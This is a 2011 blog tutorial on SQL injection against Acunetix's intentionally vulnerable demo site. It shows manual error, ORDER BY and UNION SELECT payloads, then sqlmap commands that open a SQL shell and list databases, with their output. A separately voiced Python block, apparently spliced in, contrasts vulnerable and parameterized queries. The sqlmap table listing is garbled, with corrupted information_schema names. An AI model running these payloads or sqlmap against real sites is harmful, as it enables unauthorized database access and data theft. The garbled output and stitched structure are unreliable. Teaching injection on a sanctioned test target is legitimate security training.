Saturday, 12 March 2011

How to do sql injections with SQLMAP

Hi everyone, today I will explain how to use a tool called sqlmap. This tool makes your life easier: instead of guessing the correct URL to get the information you need from the server with weird and complex combinations, it automates the work. There is a website that Acunetix made available for SQL injection tests: http://testphp.vulnweb.com/

So, I know that there is a problem in this URL http://testphp.vulnweb.com/listproducts.php?cat=1, because if you type http://testphp.vulnweb.com/listproducts.php?cat=' you get a MySQL error:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php on line 74


Now if you want to know how many fields this table has, you have to type this:
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 4--
and so on until you get another error. In this case it is 11, so you know that there are 11 fields in this table, because if you put order by 12 you get an error.
OK, now if you want to know the user that is running this database I would type:
http://testphp.vulnweb.com/listproducts.php?cat=1 UNION SELECT ALL 1,USER(),3,4,5,6,7,8,9,10,11--
Or the database name:
http://testphp.vulnweb.com/listproducts.php?cat=1 UNION SELECT ALL 1,DATABASE(),3,4,5,6,7,8,9,10,11--
Check the bottom of the page for the results.
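To see why the `'`, `order by N--` and `UNION SELECT` requests above behave the way they do, here is an added example (my own code, not the blog's or Acunetix's) that rebuilds the flaw in a small in-memory SQLite database instead of MySQL: the products table with its three columns is constructed, `sqlite_version()` stands in for MySQL's `version()`, and the function names are mine. The same handler is shown with the parameter bound properly, where the payloads are just a value that matches nothing.

```python
import sqlite3

# Constructed sample schema, loosely modelled on listproducts.php?cat=N.
# Three columns instead of the real site's eleven; the data is made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        INSERT INTO products VALUES (1, 'poster', 1), (2, 'mug', 1),
                                    (3, 'shirt', 2);
    """)
    return conn

def list_products_vulnerable(conn, cat):
    """The flaw behind listproducts.php: the cat parameter is pasted into the
    SQL text, so the client controls the statement's structure, not just a
    value. A lone quote breaks the syntax (the MySQL error in the post),
    ORDER BY N probes the column count, UNION appends attacker-chosen rows."""
    sql = f"SELECT id, name, cat FROM products WHERE cat={cat}"
    return conn.execute(sql).fetchall()

def list_products_fixed(conn, cat):
    """Hardened form: cat is bound as a parameter. The DBMS parses the
    statement once, with the placeholder already in place, and the payload
    is compared to the cat column as an opaque value; it never becomes SQL."""
    return conn.execute(
        "SELECT id, name, cat FROM products WHERE cat=?", (cat,)
    ).fetchall()

def probe(conn, cat):
    """Run the vulnerable handler and report ('rows', rows) or
    ('error', message), the two outcomes the post reads off the page when
    counting columns with ORDER BY. Echoing the message is itself a leak;
    a real handler should log it and show a generic page instead."""
    try:
        return ("rows", list_products_vulnerable(conn, cat))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "'", "1 order by 3--", "1 order by 4--",
                    "1 UNION SELECT ALL 1,sqlite_version(),3--"):
        print("vulnerable", repr(payload), probe(db, payload))
        print("fixed     ", repr(payload), list_products_fixed(db, payload))
```

Run it and compare the two columns: the vulnerable handler errors on `'` and on `order by 4` (one past the real column count) and returns an extra row carrying the engine version for the UNION payload, while the bound version returns rows only for `1`.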


Pretty boring and time consuming, huh? Let's make this easier with sqlmap.
You can download sqlmap or use the one that is in BackTrack: root@bt:/pentest/database/sqlmap/
Open sqlmap.conf and put the vulnerable URL in the url field; it should look like this:
url = http://testphp.vulnweb.com/listproducts.php?cat=1
Save it and now let's run some tests.

1) sqlmap -h (look at all the different things you can do)
2) let's open a SQL shell on the remote server with this command: ./sqlmap.py -c sqlmap.conf --sql-shell
Now you are in a shell and you can type any SQL query. Here are some examples from my SQL shell:

web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[21:28:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> version()
do you want to retrieve the SQL statement output? [Y/n] y
[21:28:55] [INFO] fetching SQL query output: 'version()'
[21:28:55] [INFO] retrieved: 5.0.22-Debian_0ubuntu6.06.6-log
version(): '5.0.22-Debian_0ubuntu6.06.6-log'

sql-shell> user()
do you want to retrieve the SQL statement output? [Y/n] y
[21:29:39] [INFO] fetching SQL query output: 'user()'
[21:29:39] [INFO] retrieved: acuart@localhost
user(): 'acuart@localhost'

################
Now let's list all databases and tables with the command: ./sqlmap.py -c sqlmap.conf --tables
And this is the result:
Database: acuart
[7 tables]
+---------------------------------------+
| aaars |
| aaastbes |
| aaastbook |
| aaatured |
| aarts |
| aateg |
| artists |
+---------------------------------------+

Database: modrewriteShop
[1 table]
+---------------------------------------+
| products |
+---------------------------------------+

Database: information_schema
[16 tables]
+---------------------------------------+
| CABGG |
| CABGGERIVILEGES |
| CABGGERS |
| CABLES |
| CABLE_CONSTRAINTS |
| CABLE_PRIVILEGES |
| CCATISTICS |
| CCHEMATA |
| CCHEMA_PRIVILEGES |
| CEUTINES |
| CEY_COLUMN_USAGE |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
+---------------------------------------+


Pretty easy, don't you think? Well, this is just an introduction to what you can do with sqlmap, have fun!!
